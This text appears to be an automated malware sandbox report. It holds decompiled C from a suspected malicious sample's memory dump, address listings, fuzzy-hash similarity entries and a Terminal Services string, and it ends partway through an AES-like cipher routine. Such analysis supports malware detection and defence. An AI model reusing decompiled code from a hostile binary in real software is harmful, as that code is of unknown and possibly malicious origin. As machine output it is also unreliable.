            				_t480[3] = _t480[3] + _t404;
            				_t311 = _t480[4] + _v16;
            				 *_t480 =  *_t480 + _t499;
            				_t480[1] = _t480[1] + _t279;
            				_t480[4] = _t311;
            				_t480[0x17] = 0;
            				return _t311;
            			}
































































            0x00409e3b
            0x00409e3f
            0x00409e41
            0x00409e41
            0x00409e44
            0x00409e66
            0x00409e8c
            0x00409eb2
            0x00409ed4
            0x00409edb
            0x00409ede
            0x00409ee1
            0x00409eea
            0x00409ef0
            0x00409ef7
            0x00409f08
            0x00409f0b
            0x00409f0e
            0x00409f12
            0x00409f14
            0x00409f16
            0x00409f1f
            0x00409f22
            0x00409f25
            0x00409f30
            0x00409f36
            0x00409f38
            0x00409f38
            0x00409f3b
            0x00409f3e
            0x00409f3e
            0x00409f43
            0x00409f45
            0x00409f48
            0x00409f4b
            0x00409f51
            0x00409f54
            0x00409f57
            0x00409f60
            0x00409f66
            0x00409f6f
            0x00409f7e
            0x00409f85
            0x00409f88
            0x00409f8b
            0x00409f94
            0x00409f97
            0x00409f9a
            0x00409fb2
            0x00409fb9
            0x00409fbb
            0x00409fbe
            0x00409fc1
            0x00409fca
            0x00409fd1
            0x00409fd4
            0x00409fd7
            0x00409fe6
            0x00409fed
            0x00409ff0
            0x00409ff3
            0x00409ffc
            0x0040a006
            0x0040a009
            0x0040a015
            0x0040a018
            0x0040a01f
            0x0040a022
            0x0040a025
            0x0040a02a
            0x0040a02d
            0x0040a036
            0x0040a047
            0x0040a04a
            0x0040a04d
            0x0040a054
            0x0040a057
            0x0040a05a
            0x0040a05d
            0x0040a05f
            0x0040a062
            0x0040a065
            0x0040a06e
            0x0040a073
            0x0040a073
            0x0040a088
            0x0040a08b
            0x0040a08e
            0x0040a095
            0x0040a098
            0x0040a09b
            0x0040a0b0
            0x0040a0b7
            0x0040a0ba
            0x0040a0be
            0x0040a0c1
            0x0040a0c6
            0x0040a0c9
            0x0040a0d8
            0x0040a0db
            0x0040a0e2
            0x0040a0e5
            0x0040a0e8
            0x0040a0eb
            0x0040a0ee
            0x0040a0f6
            0x0040a104
            0x0040a107
            0x0040a10a
            0x0040a10a
            0x0040a111
            0x0040a114
            0x0040a117
            0x0040a11f
            0x0040a12d
            0x0040a130
            0x0040a137
            0x0040a13a
            0x0040a13d
            0x0040a140
            0x0040a143
            0x0040a14c
            0x0040a153
            0x0040a153
            0x0040a159
            0x0040a172
            0x0040a175
            0x0040a17c
            0x0040a17f
            0x0040a182
            0x0040a194
            0x0040a19e
            0x0040a1a1
            0x0040a1aa
            0x0040a1ad
            0x0040a1b4
            0x0040a1b7
            0x0040a1bd
            0x0040a1d0
            0x0040a1d7
            0x0040a1da
            0x0040a1dd
            0x0040a1e0
            0x0040a1e9
            0x0040a1ec
            0x0040a1ff
            0x0040a202
            0x0040a20c
            0x0040a20f
            0x0040a211
            0x0040a21a
            0x0040a21d
            0x0040a230
            0x0040a236
            0x0040a239
            0x0040a240
            0x0040a242
            0x0040a245
            0x0040a248
            0x0040a24b
            0x0040a24e
            0x0040a251
            0x0040a25a
            0x0040a25f
            0x0040a262
            0x0040a262
            0x0040a275
            0x0040a278
            0x0040a27b
            0x0040a282
            0x0040a285
            0x0040a288
            0x0040a28b
            0x0040a29e
            0x0040a2a1
            0x0040a2ac
            0x0040a2af
            0x0040a2bb
            0x0040a2be
            0x0040a2c4
            0x0040a2c7
            0x0040a2ca
            0x0040a2d1
            0x0040a2e1
            0x0040a2e4
            0x0040a2ea
            0x0040a2ed
            0x0040a2f4
            0x0040a2f6
            0x0040a2f9
            0x0040a2fc
            0x0040a2ff
            0x0040a302
            0x0040a309
            0x0040a318
            0x0040a31b
            0x0040a322
            0x0040a325
            0x0040a328
            0x0040a32b
            0x0040a32e
            0x0040a331
            0x0040a334
            0x0040a33d
            0x0040a34e
            0x0040a356
            0x0040a35c
            0x0040a35f
            0x0040a361
            0x0040a364
            0x0040a367
            0x0040a374

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction ID: eeb0385743567321b296ee52300d967ee07cf61effa89e1da4901bd412379478
            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction Fuzzy Hash: 11021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: /X
            • API String ID: 0-2476569911
            • Opcode ID: e1697be07d4b3e391454b97d204eaaa09069d2796e29debf660cd1e0951ac95a
            • Instruction ID: 70354d279e57c4867b3811c5617f5ceb2ea30d1ba5fb74e9ecb6d3b536d06d6a
            • Opcode Fuzzy Hash: e1697be07d4b3e391454b97d204eaaa09069d2796e29debf660cd1e0951ac95a
            • Instruction Fuzzy Hash: 3BE1D375A0231DCFDB24DF24C984BB9B7B6BF85314F1401AAEA099B291D734AD81CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: PATH
            • API String ID: 0-1036084923
            • Opcode ID: bccf0257cd1586879add6644fc5a2a2463c62138a8618d9a4d2b352d512d846b
            • Instruction ID: d7cdaa0fcda9c3a96bd8b94aeb732d96ac32cc5ce4d8c74257de2480b88063ca
            • Opcode Fuzzy Hash: bccf0257cd1586879add6644fc5a2a2463c62138a8618d9a4d2b352d512d846b
            • Instruction Fuzzy Hash: 1CC180B1D00219DFCB24DFA9D991BEEB7B5FF48740F194029E811AB290E734E991CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: f9e51fa7ed1cb36f85b7a86adbf40520465290fbffd2fdb35cf32ec65272afcf
            • Instruction ID: 85f4b361284323f6fb4bf54e0dff86c5ddee1edd2cd582e4fa9b63009e435ab0
            • Opcode Fuzzy Hash: f9e51fa7ed1cb36f85b7a86adbf40520465290fbffd2fdb35cf32ec65272afcf
            • Instruction Fuzzy Hash: 72618A72D00219AFDF21DFA8C944BEEBBB4FF84711F20426AE814A7250D7749E45CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
            • Instruction ID: e028784c3c80aa6a270f3554af3c4bc39ce3c7db44509949eb4c7d647d2a3bfd
            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
            • Instruction Fuzzy Hash: FE51B071604710AFC321DF28C941A6BB7F8FF48B50F108A2DFA9587691E7B4E954CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: BinaryHash
            • API String ID: 0-2202222882
            • Opcode ID: 50dac8ce4c771580edd9336b43a9f2e2e5e1a430000f3fef47b7979df49be3e1
            • Instruction ID: 1df265708a288d5819395a784303606256f47241dadd4883a04c4a5f8c1667fd
            • Opcode Fuzzy Hash: 50dac8ce4c771580edd9336b43a9f2e2e5e1a430000f3fef47b7979df49be3e1
            • Instruction Fuzzy Hash: 9C416FB2D0012CABDF21DA54DD81FEEB77CAB44714F0045A5FA09AB241DB709F898FA4
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: `
            • API String ID: 0-2679148245
            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
            • Instruction ID: f58bee6d5befff9ca349c65bd2aaa53c12816f959f3b66f92c222c55a6943b4b
            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
            • Instruction Fuzzy Hash: A931C0326043456BE720DF28CD95F9B77DDAB84754F044229FA589B2C2E7B0ED24CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: #
            • API String ID: 0-1885708031
            • Opcode ID: 7214fd34cf6f3db3f10b96e9e4271c303fd579c4ef9ef36f97b02541178c6b54
            • Instruction ID: 3e75672c8524c6f2a4bf4199c03140bfe8ce0756d9df419efed218ab8e2ee047
            • Opcode Fuzzy Hash: 7214fd34cf6f3db3f10b96e9e4271c303fd579c4ef9ef36f97b02541178c6b54
            • Instruction Fuzzy Hash: 8341A975A0021ADBCB24DF48C990BBEB7B9EF85701F10015AFA56AB241DB34D941CBE1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00A140E8
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
            • API String ID: 0-996340685
            • Opcode ID: 22efebbed4a01f2a4940371cb0896b7556aa7609e05d211f54d33c9f0df3a2b7
            • Instruction ID: 2b9aa644ca9a46a19c6d872a19641c5f3d634655e974238e04e42c519ae70623
            • Opcode Fuzzy Hash: 22efebbed4a01f2a4940371cb0896b7556aa7609e05d211f54d33c9f0df3a2b7
            • Instruction Fuzzy Hash: E1418F75A0074AAAC724DFA8C4416E6F7F4AF19710F00492EDAAAC7240E334A585CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: BinaryName
            • API String ID: 0-215506332
            • Opcode ID: fb22ddded77598f2fe0f2f1673ff7844e80189fcc99521e995f5dde24a79d9f0
            • Instruction ID: 79fe89349dae2dafda06cb54d057d35c92e36463104d49005b870ff92b832385
            • Opcode Fuzzy Hash: fb22ddded77598f2fe0f2f1673ff7844e80189fcc99521e995f5dde24a79d9f0
            • Instruction Fuzzy Hash: B2312133D01619AFEF15CB59C951E6FB7B4EB80B20F014129E914A7280D7709F01CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 02d375e901fb72281cbd1f6a95c150bd2bca11b6bc4b8b248e13e919edb16619
            • Instruction ID: 390031d34dd288727e758834ae9d9bb4843b4d96ad9b85e8b8a512012db2a38e
            • Opcode Fuzzy Hash: 02d375e901fb72281cbd1f6a95c150bd2bca11b6bc4b8b248e13e919edb16619
            • Instruction Fuzzy Hash: DC31CFB15083049FC310DF28D9819ABBBF8EB89754F000A2EF9A497250D734DD48CBA3
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Actx
            • API String ID: 0-89312691
            • Opcode ID: 612aef92f87a6b9974341099053117c8ab4549d11e079a100bfc5ded6efb2618
            • Instruction ID: b87ef36afb79972466f76b06c72ed401a52acca48f654c33a09b4867bd94eb34
            • Opcode Fuzzy Hash: 612aef92f87a6b9974341099053117c8ab4549d11e079a100bfc5ded6efb2618
            • Instruction Fuzzy Hash: 6211B235B0470A8FEB348F1DA89073672A5AB95724F35453AE865EBBD1DBB0CC418343
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
            • Instruction ID: d30ebbe8d3dc833c0c1a48f4d75c74c2ba5329e47944e90dd1e1142869a4d4ff
            • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
            • Instruction Fuzzy Hash: 4162E736E046969BCB23CF26C45037ABBA5AF95310F3D85BACC999B242D375DD41C780
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 07190870850110f0c073eba39ca512680042bdbb972ab7ca5ef1c9cc8e453b64
            • Instruction ID: 2d0a9a9c1114ef2186d64a611fdf104e5eb398f291d424f0caaa23312fdf2067
            • Opcode Fuzzy Hash: 07190870850110f0c073eba39ca512680042bdbb972ab7ca5ef1c9cc8e453b64
            • Instruction Fuzzy Hash: 2342E34644E3D25FE7034B7468756E2BFB18F17260B0E56DBE0C48F4A3D10917AAE7A2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f6e015c1c633b7188c4afbe1184e1d2bf116b156d9ce2e640d78537b3a23516c
            • Instruction ID: 6ad34a6180b1264a05bee3c043e91362dbc08c6660acd254af44685ce73e743f
            • Opcode Fuzzy Hash: f6e015c1c633b7188c4afbe1184e1d2bf116b156d9ce2e640d78537b3a23516c
            • Instruction Fuzzy Hash: AA32F34644E3D25FE7030B7468756E2BFB18F17260B0E56DBE0C48F4A3D10916AEE7A2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 75d3192128628d588d69e17ffc3727c36a2104e5cc39a7e6837ecbfe654fde13
            • Instruction ID: 78574360e5592d814d74077a4428712666e1e36dbbe5e404b4de8b73a1608bd3
            • Opcode Fuzzy Hash: 75d3192128628d588d69e17ffc3727c36a2104e5cc39a7e6837ecbfe654fde13
            • Instruction Fuzzy Hash: 6D228231E00A158FCB19CF69C490AAEB3F1BF9A314F28856DD8519B385DB34AD41CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8699e4f1d66b72dbc053f45412415d4d25ddf09aefc166c41688923dc01fca63
            • Instruction ID: 190df85abe7174a778cc841d723f73d835ab107650336bdf030536e08e6f91f2
            • Opcode Fuzzy Hash: 8699e4f1d66b72dbc053f45412415d4d25ddf09aefc166c41688923dc01fca63
            • Instruction Fuzzy Hash: E3228071A042118FCB19CF19C590A6AB7E1FF8A314F188A6DE896CB391D734EC46CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c1735f5a65dec231d97b7cbc1e33e2489666414e40378b7416c2b174e0c7d25c
            • Instruction ID: 2aef71afe8a86a5a0cede02fb345276089013c56f764315d24cde9d7ea3cab3b
            • Opcode Fuzzy Hash: c1735f5a65dec231d97b7cbc1e33e2489666414e40378b7416c2b174e0c7d25c
            • Instruction Fuzzy Hash: FD02A272E006158BCB18CFA9C9916FEFBF9AF88300B59856DD456DB382D734E941CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4b697e7b844d000a3931c73c58bb82c368a47e59e554ff9483f4d6f1246d7503
            • Instruction ID: 19ad047f74e9c6dae7917687b8a7270c9798b6f47234a189ff87a6ff82564f5a
            • Opcode Fuzzy Hash: 4b697e7b844d000a3931c73c58bb82c368a47e59e554ff9483f4d6f1246d7503
            • Instruction Fuzzy Hash: F4026E75D0821DCFCB28CF99E494AADB7B1EF44700F65812EE816AB2D0E770AC91CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e9297a5568a85ba42f27adc1b0338b9191e37faec70d9c0185a9082ad6d5ca6e
            • Instruction ID: eba02784125cd233ada86c07f325968ea13596aef537440a3821a72e411b5c9e
            • Opcode Fuzzy Hash: e9297a5568a85ba42f27adc1b0338b9191e37faec70d9c0185a9082ad6d5ca6e
            • Instruction Fuzzy Hash: 4E02F2746046518BD764CF29C480276BBF1EF4A340B2DC59AE8E6CB2C1D339E956EF60
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 126b9c1711bdc18ee9fafbac481c62e4654dd38ad0d0f8b43b1ef5d05c7dbe08
            • Instruction ID: 613878a2e3f3a806060a23cde33f80559624406c55d7d5b78c1f806bbbb5b1d1
            • Opcode Fuzzy Hash: 126b9c1711bdc18ee9fafbac481c62e4654dd38ad0d0f8b43b1ef5d05c7dbe08
            • Instruction Fuzzy Hash: F8F19272F002168BCB18DFA9C9D15FDFBF9AB59300B198269D856EB382D634DD41CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4a7ab8ea68ce2f012d5ca4be9ed12256fc7237f60614cf695965a3431dbb4f00
            • Instruction ID: ba6ea2048e2f13434bbe6cfb5478656d39d26415e88bf9b10e297ec269c990fb
            • Opcode Fuzzy Hash: 4a7ab8ea68ce2f012d5ca4be9ed12256fc7237f60614cf695965a3431dbb4f00
            • Instruction Fuzzy Hash: 17F17AB46082158BCB24CF19D480A7AB7F1FF98704F15892EF98ACB290E735DD91DB52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 26%
            			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				void* _t273;
            				signed int _t274;
            				signed int _t282;
            				signed int* _t358;
            				signed int _t383;
            				signed int* _t409;
            				signed int _t429;
            				signed int _t458;
            				signed int _t478;
            				signed int _t560;
            				signed int _t603;
            
            				_t273 = __eax;
            				asm("ror edi, 0x8");
            				asm("rol edx, 0x8");
            				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
            				asm("ror ebx, 0x8");
            				asm("rol edx, 0x8");
            				_v20 = _t458;
            				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
            				asm("ror ebx, 0x8");
            				asm("rol edx, 0x8");
            				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
            				asm("ror esi, 0x8");
            				asm("rol edx, 0x8");
            				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
            				asm("ror edx, 0x10");
            				asm("ror esi, 0x8");
            				asm("rol esi, 0x8");
            				_v24 = _t282;
            				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
            				asm("ror esi, 0x10");
            				asm("ror ebx, 0x8");
            				asm("rol ebx, 0x8");
            				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
            				asm("ror ebx, 0x8");
            				asm("ror edi, 0x10");
            				asm("rol edi, 0x8");
            				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
            				asm("ror edi, 0x10");
            				asm("ror ebx, 0x8");
            				asm("rol ebx, 0x8");
            				_t409 =  &(__ecx[8]);
            				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
            				_t478 = (_a4 >> 1) - 1;
            				_a4 = _t478;
            				if(_t478 != 0) {
            					do {
            						asm("ror edi, 0x10");
            						asm("ror ebx, 0x8");
            						asm("rol ebx, 0x8");
            						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
            						asm("ror edi, 0x10");
            						asm("ror ebx, 0x8");
            						asm("rol ebx, 0x8");
            						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
            						asm("ror ebx, 0x8");
            						asm("ror edi, 0x10");
            						asm("rol edi, 0x8");
            						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
            						asm("ror edi, 0x10");
            						asm("ror edx, 0x8");
            						asm("rol edx, 0x8");
            						_v24 = _t383;
            						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
            						asm("ror edx, 0x10");
            						asm("ror esi, 0x8");
            						asm("rol esi, 0x8");
            						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
            						asm("ror esi, 0x10");
            						asm("ror ebx, 0x8");
            						asm("rol ebx, 0x8");
            						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
            						_v12 = _t560;
            						asm("ror edi, 0x8");
            						asm("ror ebx, 0x10");
            						asm("rol ebx, 0x8");
            						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
            						asm("ror ebx, 0x10");
            						asm("ror edi, 0x8");
            						asm("rol edi, 0x8");
            						_t409 =  &(_t409[8]);
            						_t205 =  &_a4;
            						 *_t205 = _a4 - 1;
            						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
            					} while ( *_t205 != 0);
            				}
            				asm("ror ebx, 0x8");
            				asm("rol edi, 0x8");
            				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
            				asm("ror ebx, 0x8");
            				asm("rol edi, 0x8");
            				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
            				asm("ror ebx, 0x8");
            				asm("rol edi, 0x8");
            				_t358 = _a8;
            				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
            				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
            				asm("ror ecx, 0x8");
            				asm("rol edi, 0x8");
